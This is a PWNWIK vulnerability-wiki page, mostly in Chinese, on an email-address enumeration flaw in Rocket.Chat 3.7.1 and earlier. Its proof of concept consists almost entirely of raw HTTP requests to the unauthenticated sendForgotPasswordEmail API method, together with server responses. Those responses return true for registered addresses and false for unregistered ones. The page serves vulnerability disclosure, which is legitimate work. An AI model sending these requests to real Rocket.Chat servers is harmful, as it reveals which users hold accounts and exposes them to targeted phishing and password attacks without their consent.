PWNWIK.COM
,
简介
Rocket.Chat 3.7.1 及以下版本存在电子邮件地址枚举漏洞。
POC
################ Sample HTTP request sent with a registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: localhost:3000 Content-Length: 122 Accept: */* Content-Type: application/json {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":\"email protected\",\"id\":\"3\"}"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to a valid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Instance-ID: DQDfuEfNLdbZr3zYH Cache-Control: no-store Pragma: no-cache content-type: application/json Vary: Accept-Encoding Date: Tue, 03 Nov 2020 12:01:25 GMT Connection: keep-alive Content-Length: 78 {"message":"{\"msg\":\"result\",\"id\":\"3\",\"result\":true}","success":true} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sample HTTP request sent with a non registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: localhost:3000 Content-Length: 119 Accept: */* Content-Type: application/json {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":\"email protected\",\"id\":\"3\"}"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to an invalid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Instance-ID: DQDfuEfNLdbZr3zYH Cache-Control: no-store Pragma: no-cache content-type: application/json Vary: Accept-Encoding Date: Tue, 03 Nov 2020 12:03:08 GMT Connection: keep-alive Content-Length: 79 {"message":"{\"msg\":\"result\",\"id\":\"3\",\"result\":false}","success":true} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
免费、自由、人人可编辑的漏洞库